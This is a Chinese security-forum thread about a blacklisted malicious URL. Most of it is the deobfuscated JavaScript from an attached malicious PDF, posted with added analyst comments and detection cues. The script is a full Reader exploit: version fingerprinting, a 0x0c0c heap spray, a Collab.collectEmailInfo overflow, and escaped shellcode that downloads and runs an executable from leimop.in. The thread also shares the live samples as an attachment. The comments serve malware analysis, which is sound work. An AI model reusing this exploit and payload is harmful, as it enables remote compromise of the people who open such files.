
[黑名单] http://leimop.in/nte/CORV.html

http://leimop.in/nte/CORV.html



引用:

关于:hxxp://leimop.in/nte/CORV.html解密的日志(全体输出 -  9):

Level  0>http://leimop.in/nte/CORV.html
Level  1>http://leimop.in/nte/CORV.html/wHf7ff04faV0100f060006Rff8f600a102Tbba704ba
Level  2>http://leimop.in/nte/CORV.html/yH07cb74cfV0100f060006Rff8f600a102Tbba70453303
Level  2>http://leimop.in/nte/CORV.html/yH07cb74cfV0100f060006Rff8f600a102Tbba70453302
Level  2>http://leimop.in/nte/CORV.html/xH07cb74cfV0100f060006Rff8f600a102Tbba70453324
Level  3>http://leimop.in/nte/CORV.html/yH07cb74cfV0100f060006Rff8f600a102T4b93758f324
Level  2>http://leimop.in/nte/CORV.html/xH07cb74cfV0100f060006Rff8f600a102Tbba70453317
Level  2>http://leimop.in/nte/CORV.html/xH07cb74cfV0100f060006Rff8f600a102Tbba70453303
Level  2>http://leimop.in/nte/CORV.html/xH07cb74cfV0100f060006Rff8f600a102Tbba70453326

analyzed by 是昔流芳


2个PDF,大家玩玩吧

话说论坛也该开放 7z 扩展名的附件上传吧

用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8

附件:

文件名:pdf.zip
下载次数:207
文件类型:application/x-zip-compressed
文件大小:
上传时间:2010-8-3 20:15:34
描述:zip


回复:http://leimop.in/nte/CORV.html

recode不会用 啥加密方式也看不明白。需要多多学习

回复: http://leimop.in/nte/CORV.html

第一个PDF.

// Script-wide state of the JavaScript extracted from the first PDF.
// All identifiers are obfuscated in the sample; the notes below describe use, not intent.
// Vvej_wIx: global array that W7____3VlXx fills with large filler+stub strings
// (presumably global so the strings stay referenced after that function returns).
var Vvej_wIx = new Array();
// u8SWp_1d7: timer handle; set from app.setTimeOut at the end of the script and
// later passed to app.clearTimeOut.
var u8SWp_1d7 = 0;
// U_3F_KoylQ_i: not referenced anywhere else in the listing as posted.
var U_3F_KoylQ_i = "";
/**
 * Builds a short ASCII tag of the form "3" + HH + "P" + DDDDDDDD.
 *
 * HH is the first argument as two hex digits; DDDDDDDD is derived from the
 * decimal digits of the second argument. The only caller in this listing,
 * W7____3VlXx, passes the constant 23 and the detected viewer/plug-in version,
 * and the result is appended to the embedded payload by dI_X78Nb.
 * NOTE(review): presumably a tracking suffix (exploit id + reader version) for
 * the URL embedded in the payload; confirm against captured traffic.
 *
 * @param {number} jo84w3k - number rendered as the two-hex-digit field.
 * @param {number} K4_3_3n_0nol - value whose decimal digits form the 8-char field.
 * @returns {string} the tag string.
 */
function G6uQ3W4M5(jo84w3k, K4_3_3n_0nol)
{
var P5abg__gNsj = K4_3_3n_0nol.toString();
var aX1a06jm = "";
// Walk the string form one character at a time; non-digits (e.g. ".") are skipped.
for(var KP__M2 = 0; KP__M2 < P5abg__gNsj.length; KP__M2++)
{
var OB_M_ci = parseInt(P5abg__gNsj.substr(KP__M2, 1));
if (!isNaN(OB_M_ci))
{
// A single decimal digit always yields one hex character, so only the
// zero-padding branch below is reachable for this input.
OB_M_ci = OB_M_ci.toString(16);
if (OB_M_ci.length == 1)
{
OB_M_ci = "0" + OB_M_ci;
}
else if (OB_M_ci.length != 2)
{
OB_M_ci = "00";
}
// Prepending reverses the digit order: "9.13" becomes "030109".
aX1a06jm = OB_M_ci + aX1a06jm;
}
}
// Left-pad the digit field with "0" up to eight characters.
while(aX1a06jm.length < 8)
{
aX1a06jm = "0" + aX1a06jm;
}
// First argument as exactly two hex digits; anything wider collapses to "00".
var U0jiqi__Ul = jo84w3k.toString(16);
if (U0jiqi__Ul.length == 1)
{
U0jiqi__Ul = "0" + U0jiqi__Ul;
}
else if (U0jiqi__Ul.length != 2)
{
U0jiqi__Ul = "00";
}
aX1a06jm = "3" + U0jiqi__Ul + "P" + aX1a06jm;
return aX1a06jm;
}
/**
 * Appends a plain ASCII string to a "%uXXXX"-escaped byte blob.
 *
 * Each character of the second argument becomes one byte; bytes are emitted
 * two at a time as "%u" + high + low, i.e. little-endian 16-bit units, followed
 * by zero terminators. If the blob ends in a "%u00XX" unit, XX is treated as a
 * dangling odd byte and re-paired with the first appended byte so the byte
 * stream stays contiguous.
 *
 * @param {string} B_8P8fE__rei - existing "%u"-escaped blob (not yet unescaped).
 * @param {string} apGd_cYAOY_1CI4 - ASCII text to append.
 * @returns {string} the extended "%u"-escaped string, still escaped.
 */
function dI_X78Nb(B_8P8fE__rei, apGd_cYAOY_1CI4)
{
// Slot 0 holds the carried-over byte (empty string when there is none).
var e4_43M_R_ht = new Array("");
var xc_w_g2egEF8c = B_8P8fE__rei;
var JH8_m2JR_c;
if ((JH8_m2JR_c = B_8P8fE__rei.lastIndexOf("%u00")) != -1)
{
// Only a "%u00XX" that is the very last unit counts as a dangling byte.
if (JH8_m2JR_c + 6 == B_8P8fE__rei.length)
{
e4_43M_R_ht[0] = B_8P8fE__rei.substr(JH8_m2JR_c + 4, 2);
xc_w_g2egEF8c = B_8P8fE__rei.substring(0, JH8_m2JR_c);
}
}
JH8_m2JR_c = 1;
// KP__M2 is assigned without var in this function, so it is an implicit global.
for (KP__M2 = 0; KP__M2 < apGd_cYAOY_1CI4.length; KP__M2++)
{
var US_6f__v = apGd_cYAOY_1CI4.charCodeAt(KP__M2).toString(16);
if (US_6f__v.length == 1)
{
US_6f__v = "0" + US_6f__v;
}
e4_43M_R_ht[JH8_m2JR_c] = US_6f__v;
JH8_m2JR_c++;
}
// Start at slot 0 when a carried byte exists, otherwise at slot 1.
KP__M2 = e4_43M_R_ht[0].length ? 0 : 1;
// Two zero bytes terminate the appended text.
e4_43M_R_ht[JH8_m2JR_c] = "00";
e4_43M_R_ht[JH8_m2JR_c + 1] = "00";
JH8_m2JR_c += 2;
// Pad with one more zero byte when the count is odd, so bytes pair up.
if ((e4_43M_R_ht.length - KP__M2) % 2)
{
e4_43M_R_ht[JH8_m2JR_c] = "00";
}
// Emit byte pairs with the second byte first (little-endian 16-bit units).
while(KP__M2 < e4_43M_R_ht.length)
{
xc_w_g2egEF8c += "%u" + e4_43M_R_ht[KP__M2 + 1] + e4_43M_R_ht[KP__M2];
KP__M2 += 2;
}
xc_w_g2egEF8c += "%u0000";
return xc_w_g2egEF8c;
}
/**
 * Grows a string by repeated doubling, then trims it to HYJdIB5qr_3_do / 2
 * characters (the size argument is counted in bytes, two per character).
 *
 * NOTE(review): the loop condition below spells the size identifier in upper
 * case, which does not match the parameter name; the listing as posted is
 * therefore not a byte-faithful copy of the sample (likely a forum
 * transcription artifact). Work from the attached file, not this text, when
 * writing signatures.
 *
 * @param {string} COLT1CVp - seed string to repeat.
 * @param {number} HYJdIB5qr_3_do - target size in bytes.
 * @returns {string} the repeated and truncated string.
 */
function S_Xx_g(COLT1CVp, HYJdIB5qr_3_do)
{
while (COLT1CVp.length*2<HYJDIB5QR_3_DO)
{
COLT1CVp += COLT1CVp;
}
COLT1CVp = COLT1CVp.substring(0,HYJdIB5qr_3_do/2);
return COLT1CVp;
}
/**
 * Heap-spray stage of the sample: stores the main binary payload on the `app`
 * object and fills the global array Vvej_wIx with large filler+stub strings.
 *
 * Analyst notes (defensive):
 *  - The filler is the caller-supplied "%u0c0c%u0c0c" pattern and the target
 *    constant is 0x0c0c0c0c; block size is 0x400000 bytes. From these constants
 *    the loop runs 48 times, i.e. roughly 192 MiB of string data.
 *  - The tail of the long literal decodes (low byte first in each %u unit) to
 *    ASCII text: fragments "urlmon" and ".exe", then
 *    hxxp://leimop[.]in/nte/CORV.html/yH53c9d27aV0100f060006Rff8f600a102T4b9375dc
 *    (decoded by hand from the literal on this page; re-verify with a decoder).
 *    This is consistent with a download-and-execute payload and matches the URL
 *    family in the thread's decode log.
 *  - The short stub contains the same 0x9050 units that the long literal starts
 *    with; presumably the stub locates the main payload by that marker. Confirm
 *    in a disassembler.
 *  - Detection cues visible here: unescape() of long "%u" runs, repeated 0x0c0c
 *    filler, string doubling to multi-megabyte sizes inside PDF JavaScript.
 *
 * @param {number} d4_q__7L - id forwarded to G6uQ3W4M5 (the caller passes 23).
 * @param {string} vt_KEm - "%u"-escaped filler pattern.
 * @param {number} A_dsuv - detected version, forwarded to G6uQ3W4M5.
 */
function W7____3VlXx(d4_q__7L, vt_KEm, A_dsuv)
{
// Address the spray is sized against.
var S_6i5y_4B___K7q = 0x0c0c0c0c;
var COLT1CVp = unescape(vt_KEm);
// Tag built from the id and version; appended to the payload's embedded text.
var apGd_cYAOY_1CI4 = G6uQ3W4M5(d4_q__7L, A_dsuv);
// Short binary stub that ends every sprayed block.
var fJ1CgjD37m3M = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");
// Main binary payload, still escaped; its trailing text is the embedded URL.
var B_8P8fE__rei = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6770%u4279%u6253%u4c6b%u0062%u7468%u7074%u2f3a%u6c2f%u6965%u6f6d%u2e70%u6e69%u6e2f%u6574%u432f%u524f%u2e56%u7468%u6c6d%u792f%u3548%u6333%u6439%u3732%u5661%u3130%u3030%u3066%u3036%u3030%u5236%u6666%u6638%u3036%u6130%u3031%u5432%u6234%u3339%u3637%u6364";
// The payload plus tag is parked on a property of the global `app` object.
app.G_Ts35 = unescape(dI_X78Nb(B_8P8fE__rei, apGd_cYAOY_1CI4));
// Size of one sprayed block in bytes.
var CfOT66Krwe = 0x400000;
// Stub size in bytes (two bytes per string character).
var R1EwE18 = fJ1CgjD37m3M.length * 2;
// Filler size: block size minus the stub and a fixed 0x38-byte allowance.
var HYJdIB5qr_3_do = CfOT66Krwe - (R1EwE18+0x38);
COLT1CVp = S_Xx_g(COLT1CVp, HYJdIB5qr_3_do);
// Number of blocks needed to reach the target address from 0x400000.
var U86jeC6r_667 = (S_6i5y_4B___K7q - 0x400000)/CfOT66Krwe;
for (var U11___wpg_1nB = 0; U11___wpg_1nB < U86jeC6r_667; U11___wpg_1nB++)
{
Vvej_wIx[U11___wpg_1nB] = COLT1CVp + fJ1CgjD37m3M;
}
}
/**
 * Trigger stage of the sample: calls Collab.collectEmailInfo with an oversized
 * `msg` string made only of 0x0c0c units, then cancels the pending timer.
 *
 * The message is 12 x 2 characters repeated 750 times, i.e. 18000 characters.
 * NOTE(review): presumably this is the long-known collectEmailInfo overflow in
 * old Reader builds; the advisory id is not stated on this page, so confirm
 * against vendor advisories before labelling the sample.
 * Detection cue: any PDF JavaScript that calls Collab.collectEmailInfo with a
 * multi-kilobyte msg value.
 */
function q060nD_U6_f()
{
// 24-character unit of U+0C0C.
var Do3U0UV = "";
for (KP__M2 = 0; KP__M2 < 12; KP__M2++)
{
Do3U0UV += unescape("%u0c0c%u0c0c");
}
// Repeat the unit 750 times to build the oversized message.
var HR2R__8_Nh = "";
for (KP__M2 = 0; KP__M2 < 750; KP__M2++)
{
HR2R__8_Nh += Do3U0UV;
}
this.collabStore = Collab.collectEmailInfo(
{
subj: "", msg: HR2R__8_Nh
}
);
app.clearTimeOut(u8SWp_1d7);
}
/**
 * Timer callback: decides from the version number whether to run the spray
 * (W7____3VlXx) and the trigger (q060nD_U6_f).
 *
 * Both stages run only when the version is in [8, 8.11) or below 7.1; any other
 * version falls through and only the timer is cleared. For triage this means
 * the visible script does nothing harmful on versions outside those ranges.
 *
 * @param {number} CNQK_R__b - version value chosen by the top-level code.
 */
function m_4_Y53_wFW(CNQK_R__b)
{
// Copy the timer handle before the stages run; q060nD_U6_f also clears it.
var Yvb__dJ6Ka7pSd = u8SWp_1d7;
if ((CNQK_R__b >= 8 && CNQK_R__b < 8.11) || CNQK_R__b < 7.1)
{
// 23 is the id field of the tag; "%u0c0c%u0c0c" is the spray filler.
W7____3VlXx(23, "%u0c0c%u0c0c", CNQK_R__b);
q060nD_U6_f();
}
if (Yvb__dJ6Ka7pSd)
{
app.clearTimeOut(Yvb__dJ6Ka7pSd);
}
}
// Entry point of the embedded script: fingerprint the reader, then schedule the
// version-gated callback.
// A_dsuv ends up as the highest `version` value reported by any loaded plug-in.
var A_dsuv = 0;
var pa26_4Kl = app.plugIns;
for (var r1D_WB = 0; r1D_WB < pa26_4Kl.length; r1D_WB++)
{
var COwfJvk = pa26_4Kl[r1D_WB].version;
if (COwfJvk > A_dsuv)
{
A_dsuv = COwfJvk;
}
}
// Special case: viewer 9.103 with plug-ins below 9.13 is reported as 9.13.
// That value is outside both ranges tested in m_4_Y53_wFW, so on this viewer
// the visible code never reaches the spray/trigger calls.
if (app.viewerVersion == 9.103 && A_dsuv < 9.13)
{
A_dsuv = 9.13;
}
// The callback is attached to `app` so the string passed to setTimeOut can
// reach it by name; the string is evaluated after 50 ms.
// Detection cue: PDF JavaScript that reads app.plugIns / app.viewerVersion and
// then schedules code through app.setTimeOut with a string argument.
app.rd_vcWegv3b88l = m_4_Y53_wFW;
u8SWp_1d7 = app.setTimeOut("app.rd_vcWegv3b88l(" + A_dsuv.toString() + ")", 50);



回复: http://leimop.in/nte/CORV.html

recode

解压以后显示这个,完全看不懂 就没下文了 求解密方法



回复:http://leimop.in/nte/CORV.html

分析数据流就明显了。